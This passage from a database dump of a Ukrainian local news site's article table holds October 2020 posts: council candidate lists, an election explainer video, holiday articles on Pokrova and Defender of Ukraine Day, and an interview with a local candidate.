Geneva; font-size: 14px;\"> 10. Заречна Лілія Володимирівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 11. Кравець Леонід Петрович</span></p><p><strong><span style=\"color: #553982; font-family: Verdana, Geneva;\">ВИБОРЧИЙ ОКРУГ № 2</span></strong></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\">  1. Кудрицька Ольга Василівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 2. Мельник Олег  Васильович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 3. Пустовойтенко Олександр Валентинович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 4. Філоненко Олександр Петрович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 5. Галицька Світлана Петрівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 6. Гладких Олександр Васильович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 7. Хоменко Дмитро Васильович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 8. Черняк Артем Борисович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 9. Онопрійчук Наталія Володимирівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 10. Дідківська Наталія Григорівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 11. Осадчий Олександр Володимирович</span></p><p><strong><span style=\"color: #553982; font-family: Verdana, Geneva;\">ВИБОРЧИЙ ОКРУГ № 3</span></strong></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\">  1. Малегус Ігор Євгенович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 2. Раєць Ігор Васильович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 3. Мазур Микола Євгенович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 4. Степанець Марина Іанівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 5. Гостін Надія Геннадіївна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 6. Лось Павло Віталійович</span></p><p><strong><span style=\"color: #553982; font-family: Verdana, Geneva;\">ВИБОРЧИЙ ОКРУГ № 4</span></strong></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\">  1. Марек Ігор Станіславович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 2. Марченко Лариса Миколаївна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 3. Ничипоренко Руслана Василівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 4. Комарчук Василь Анатолійович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 5. Нікітіна Валентина Броніславівна</span></p><!--EndFragment-->','',1,8,'2020-10-10 09:08:37',430,'','2020-10-24 05:15:57',430,0,'0000-00-00 00:00:00','2020-10-10 09:08:37','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',14,34,'','',1,1278,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2477,2898,'ЦВК: Як правильно заповнити виборчий бюлетень?','tsvk-yak-pravilno-zapovniti-viborchij-byuleten','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/55fl8T4dMmE\" width=\"560\"></iframe></span></p>','',1,8,'2020-10-11 06:44:22',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2020-10-11 06:44:22','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,39,'','',1,103,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2478,2899,'\"Атлас адміністративно-територіального устрою України\"','atlas-administrativno-teritorialnogo-ustroyu-ukrajini','<p><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/agmi1_1.jpg\" width=\"864\"></p><p><span style=\"font-size: 14px;\">Атлас містить детальну інформацію щодо нового адміністративно-територіального устрою України: назви, межі, площі, кількість населення, склад по громадах кожного нового району кожної області. Переглянути атлас можна за посиланням:&nbsp;<a href=\"https://www.minregion.gov.ua/wp-content/uploads/2020/10/atlas_novogo_atu_2020__elektronna_versiya_-2.pdf\" rel=\"nofollow\" target=\"_blank\">https://www.minregion.gov.ua/wp-content/uploads/2020/10/atlas_novogo_atu_2020__elektronna_versiya_-2.pdf</a></span><!--EndFragment--></p><p><span style=\"color: #B8312F; font-size: 16px;\">Зверніть увагу на чисельність населення в новостворених районах по областях&nbsp;</span></p><p><br></p><p><br></p>','',1,8,'2020-10-12 13:53:50',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2020-10-12 13:53:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,38,'','',1,267,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2479,2900,'14 жовтня – свято Покрови Пресвятої Владичиці нашої Богородиці та Приснодіви Марії','14-zhovtnya-svyato-pokrovi-presvyatoji-vladichitsi-nashoji-bogoroditsi-ta-prisnodivi-mariji','		<p><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/pokrova.jpg\"></p><p>&nbsp;&nbsp;&nbsp;<span style=\"font-size: 15px;\">&nbsp;За переказами, у  910 році Богородиця, осяяна небесним світлом й оточена ангелами та святими,  з’явилася людям, які молилися у Влахернському храмі у Константинополі за  визволення від ворогів, які оточили місто. Пресвята Діва Марія зі сльозами  стала молити Бога за християн. Потім Божа Матір на знак того, що бере народ під  свою опіку, покрила людей у храмі чесним своїм омофором (грецький омофор –  наплічник, тобто довга широка тканина з хрестом, яку носять священники на  богослужіннях). Пресвята Владичиця сяяла небесною славою, а покрив у руках її  блищав «краще за промені сонячні». Цей дивовижний покрив і захистив місто.</span>&nbsp;','</p><p> Свято Покрови  Божої Матері та ікона Покрови – символ невпинного заступництва Владичиці за рід  людський. Воно є одним із найвеличніших свят, тому на честь нього досить часто  освячують новозбудовані храми. Покров Пресвятої Діви – знак любові та участі,  які Матір Божа відчуває до людей. Його благодать незримо покриває й захищає  кожну людину, оберігаючи від гріха і допомагаючи у нелегкий час.</p><p><span style=\"font-size: 15px;\">&nbsp;&nbsp;&nbsp;&nbsp;Цього дня часто  призначали весілля. Нерідко 14 жовтня випадає перший сніг, який асоціюється з  весільним покривалом або фатою. А ще цього дня прощалися з осінню і зустрічали  зиму, бо зазвичай на Покрову до обіду – осінь, а після обіду – зима.</span></p><p><span style=\"font-size: 15px;\">&nbsp;&nbsp;&nbsp;&nbsp;Особливе  ставлення до Покрови було в українських козаків. Згідно з переказами та легендами  саме на Покрову вони вирушали на зимівлю по своїх хуторах та зимівниках. На  Січі залишалася тільки стала залога із січовиків, які нічого, крім власної  зброї, не мали, та інших козаків, що за різними причинами залишалися у своїх  куренях. А оскільки у ті часи основним календарем були церковні свята, то і  маємо козацьке свято на Покрову.</span></p><p><span style=\"font-size: 15px;\">&nbsp;&nbsp;&nbsp;&nbsp;Українські козаки  вважали Богоматір своєю заступницею. Тому ікона Марії з омофором була у кожному  козацькому курені, а головна січова церква завжди була Покровською. З’явився  навіть особливий тип ікони – «Козацька Покрова», на якій зображували козаків та  їхніх старшин під розпростертим покровом Богородиці. У запорозьких козаків був  особливий культ Богородиці-Покрови як заступниці та захисниці від ворога.  Головна січова церква завжди називалась на честь Покрови, а її ікона була в  кожному козацькому курені. Зображували її й на хоругвах, під якими козаки  виступали у походи. Перед кожним походом навколішки ставали на молитву до  Пресвятої Богородиці «Під Твою милість прибігаємо». Після завершення походу –  незалежно від його успішності – козаки відправляли молебень на честь Божої  Матері.</span></p><p><span style=\"font-size: 15px;\">&nbsp;&nbsp;&nbsp;&nbsp;Саме на свято  Покрови Пресвятої Богородиці, 14 жовтня, на козацькій раді січовики щороку  обирали собі кошового отамана. За звичаєм, він мав двічі відмовитися від честі  очолити «шановане товариство». Погоджувався після третьої пропозиції, цим самим  підкреслюючи, що йде на це не з власної волі, а на прохання козаків.  Новообраний кошовий дякував своїм побратимам за честь їх очолювати й кланявся  на чотири боки.</span></p><p><span style=\"font-size: 15px;\">&nbsp;&nbsp;&nbsp;&nbsp;На Покрову  молилися за воїнів, які перебували у походах, захищаючи рідну землю, обирали  козацьких отаманів. До нас дійшли перекази про те, як після зруйнування  Запорозької Січі у 1775 році козаки, що пішли з рідних місць за Дунай, взяли із  собою як найбільшу цінність ікону Покрови Пресвятої Богородиці.</span></p><p><span style=\"font-size: 15px;\">Покрова вважається і датою створення Української повстанської  армії (УПА).</span></p>',1,8,'2020-10-14 05:35:23',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2020-10-14 05:35:23','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',12,37,'','',1,82,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2480,2901,'14 жовтня - День захисника України','14-zhovtnya-den-zakhisnika-ukrajini','<p><img alt=\"\" class=\"fr-fin fr-dib\" src=\"https://malehus.in.ua/images/stories/army.jpg\" width=\"805\"></p><p>&nbsp;&nbsp;&nbsp;&nbsp;14 жовтня в Україні  відзначається День захисника України, який нероздільно пов’язаний із розвитком  українського війська та його військових традицій. Щорічне державне свято встановлено Указом Президента  України № 806 від 14 жовтня 2014 року.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;У цей день українці поціновують воїнів, які  в різні часи обороняли і обороняють нашу незалежність і територіальну  цілісність, усіх захисників України незалежно від службового становища та  статі.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;Це свято пов’язане з розвитком війська від  часів Русі. Найкращі традиції захисників минулого успадкували бійці сучасних  Збройних сил України, які сьогодні відстоюють суверенітет України у війні з  російським агресором.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;Історія  цього свята має давню традицію. Покрову Пресвятої Богородиці відзначали козаки, за що  свято отримало другу назву – Козацька Покрова. Українське військо 1917–1921  років зберігало козацькі військові традиції в назвах військових частин,  структурі, прапорах, одностроях тощо.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;14 жовтня 1942 року вважається символічним  днем утворення Української повстанської армії.</p><p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/P1w2Qd8wsCQ\" width=\"560\"></iframe></span></p><p>&nbsp;&nbsp;&nbsp;&nbsp;З початком сучасної російсько-української  війни майже чотириста тисяч українців взяли зброю до рук у лавах Збройних Сил, Національної  гвардії, правоохоронних органів і добровольчих формувань, щоб зупинити агресію  Російської Федерації та відстояти незалежність України.</p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/dFBvXpFnWcc\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></span><p>&nbsp;&nbsp;&nbsp;&nbsp;Наразі Українська армія активно модернізується,  позбувається радянської спадщини та відновлює українські військові традиції</p><p>&nbsp;&nbsp;&nbsp;&nbsp;У  День захисника України ми вшановуємо сучасних захисників України та героїв  різних епох нашої історії. Це день, коли необхідно згадати загиблих вояків і  подякувати всім громадянам, які присвятили життя захисту Української держави.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;<span style=\"color: #28324E;\">Звільнити  українську територію від окупанта без збройної відсічі неможливо. Тож боєздатне  військо і внутрішня консолідація суспільства на основі спільних цінностей та  поваги до власної держави забезпечать захист і відновлення територіальної  цілісності країни.</span></p>','',1,8,'2020-10-14 05:46:50',430,'','2020-10-19 18:48:19',430,0,'0000-00-00 00:00:00','2020-10-14 05:46:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,36,'','',1,131,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2481,2902,'Виконання дохідної частини бюджетів міст, районів та ОТГ за 9 місяців 2020 року','vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-9-misyatsiv-2020-roku','	<p>За даними Департаменту фінансів Житомирської ОДА<img src=\"https://malehus.in.ua/images/stories/censor.jpg\" alt=\"\" class=\"fr-fir fr-dii\"></p>','',1,8,'2020-10-15 14:47:37',430,'','2020-10-19 18:48:19',430,0,'0000-00-00 00:00:00','2020-10-15 14:47:37','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,35,'','',1,220,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2482,2903,'Оркестр \"Малин\"- коротка історія ( архівні матеріали)','orkestr-malin-korotka-istoriya-arkhivni-materiali','	<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/EI-F93_yZ2Q\" width=\"560\"></iframe></span></p>','',1,134,'2020-10-17 07:55:07',430,'','2020-10-17 08:01:42',430,0,'0000-00-00 00:00:00','2020-10-17 07:55:07','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,1,'','',1,168,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2483,2904,'Марія Насіканова: «Я не збираюсь піаритись на порожніх обіцянках, а працювати так, щоб люди у малинській громаді почувались захищеними»','mariya-nasikanova-ya-ne-zbirayus-piaritis-na-porozhnikh-obitsyankakh-a-pratsyuvati-tak-shchob-lyudi-u-malinskij-gromadi-pochuvalis-zakhishchenimi','	<p><strong>Представляємо вам кандидата у  депутати Малинської міської ради голову малинської організації партії «Європейська  солідарність» Марію Насіканову.</strong></p><p>&nbsp;&nbsp;&nbsp;&nbsp; —Маріє Іванівно, нинішні вибори до органів  місцевого самоврядування дуже відповідальні. У суспільства визрів запит на  людей із досвідом у виробничій та управлінській сферах. Наскільки мені відомо,  у Вас такого досвіду достатньо.</p><p><img src=\"https://malehus.in.ua/images/stories/nasik.jpg\" alt=\"\" class=\"fr-fil\">—Так, із 39-ти років трудового  стажу маю десять років педагогічного, весь інший час працювала в органах  місцевого самоврядування — десять років головою сільської ради, затим в  районній раді на різних посадах. Кожен день доводилось працювати з людьми,  перейматись їхніми проблемами і щоразу вирішувати безліч питань.</p><p>—<strong>Ви  балотуєтесь у депутати обласної і міської ради?</strong></p><p>—Більше хочу пройти у міську раду,  а дорогу в обласну дати молодим енергійним людям. У нас є такі кандидати.</p><p>—  <strong>Чому віддаєте перевагу депутатству в міській раді?</strong></p><p>— У першу чергу, хочу відстоювати  права села. Ще й досі немає закону про старостинські округи, які не сформовані.  Коли глибше аналізуєш ситуацію, складається враження, що зараз відбувається  узурпація влади. Людей позбавили права самим обирати старосту села. Його будуть  призначати. А це значить, що він не зможе відстоювати інтереси громади,  проявляти власну ініціативу. Він буде маріонеткою або ж залежним від голови  міської ради. Якщо староста комусь не сподобається, знайдеться тисячу причин  його замінити на більш вигідну кандидатуру. Добре, аби старостою обирали  місцевих. Місцева людина буде в курсі всіх справ сельчан, знатиме про потреби  не тільки всієї громади, а й чи не кожної родини, кожної людини. Саме страшне в  тому, що на посаду старости може потрапити стороння людина, якій байдуже доля селян.  </p><p>—  <strong>А як фінансуватимуться сільські громади? Кошти, наскільки розумію, тепер будуть  на рахунку малинської громади. Чи перепадатиме щось селу на вирішення найнеобхідніших  проблем?</strong></p>','<p>— До реформи кожна людина в селі  знала, що в них є сільський голова, в котрого в помічниках більше десятка місцевих  депутатів. У разі виникнення якоїсь проблеми можна було чекати на її вирішення,  адже більшість сільських рад мали свої власні фінансові ресурси, які  витрачались, приміром, на огорожу кладовищ, очистку вулиць, ремонт комунальних  доріг, то віднині це все ліквідовується і кошти акумулюватимуться в один  великий кошик, який називається «міський бюджет». І де гарантія, що ці кошти  будуть потрапляти й на розвиток сіл, а не на погашення заборгованості по  очистці води, на інші нагальні потреби міста? При ліквідації сільських рад село  залишається в невигідному становищі.</p><p>&nbsp;&nbsp;  Тому я, як людина, котра знає проблеми села, зможу, у разі потреби,  відстоювати його інтереси, вибивати той мінімальний пакет фінансування, при  якому село матиме змогу нормально жити й розвиватись.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;  Багато років я мала справу з селом, працюючи і головою сільської ради, і  в районній раді, знаю і минуле, й нинішнє керівництво. Мені дороге село, я з  села вийшла і в село піду. Тож мені сьогодні шкода, що селяни можуть залишитись  незахищеними. Тому першим своїм завдання ставлю — захист сільських громад.</p><p>Кожне село — самобутнє, з  власними звичаями, які формувалися роками. Тому треба їх зберегти і примножити.  Щоб у сільських мешканців навіть не виникала думка, що вони в чомусь програли,  щоб вони почувались комфортно у великій малинській громаді</p><p><strong>А які бачите перспективи для міста?</strong></p><p>&nbsp;— Малин повинен стати зразковим європейським  містом. Для цього у нас хороший потенціал: географічне розташування, прекрасна  транспортна розв’язка. Потрібно залучати інвестиції у запуск нових і розвиток  старих підприємств, тобто все робити для створення робочих місць, розвитку  інфраструктури міста, житлово-комунального, медичного обслуговування,  покращення благоустрою.</p><p>—<strong>Інколи  про кандидата у депутати судять і по команді, в якій він знаходиться.</strong></p><p>— Наша команда — команда надійних  фахово підготовлених людей. Впевнена, що якщо вони пройдуть, то не будуть  просто займати депутатське місце, просто піднімати руку під час голосування, а  працюватимуть на совість. Серед них не тільки ті, хто добре знає проблеми села,  але й ті, кому не байдужа доля міста, своєї громади. Сьогодні у нашій команді є  керівники виробничих підрозділів, вчителі, лікарі, бухгалтера, робітники, воїни  АТО. У нас немає «товстих гаманців», ми не пов’язані з крупним бізнесом,  олігархами. Тож люди прийшли в нашу команду не захищати власний бізнес.</p><p>—  <strong>Для декого вибори — це шанс повернутись назад до влади. </strong></p><p>— Для нашої команди це не самоціль.  Ми не збираємось мірятись рейтингами з іншими політичними партіями, піаритись  на порожніх обіцянках, ми маємо намір працювати так, щоб люди жили заможніше і  почувались захищеними. Ми — команда однодумців, амбіційних людей, котрі вірять  у свої сили. Ці вибори — іспит для всіх: для політичних партій, для керівників  усіх рангів, для депутатів, для рядових працівників. Від нашого вибору залежить  стабільність у державі і якість нашого з вами життя.</p><p>&nbsp;&nbsp;&nbsp; Думаю, при виборі люди мають добре зважити,  як кандидат реалізував себе на попередньому місці роботи, які його конкретні  справи принесли користь людям та яку громадянську позицію він займає. Якщо  зробити такий аналіз, то стане зрозумілим, хто є хто. </p><p>—<strong>Що  ж, удачі Вам, а малинській громаді побажаємо зробити правильний вибір. </strong></p>',1,8,'2020-10-19 12:09:17',430,'','2020-10-24 05:21:00',430,0,'0000-00-00 00:00:00','2020-10-19 12:09:17','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,33,'','',1,275,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2484,2905,'5293 виборці із 11164, 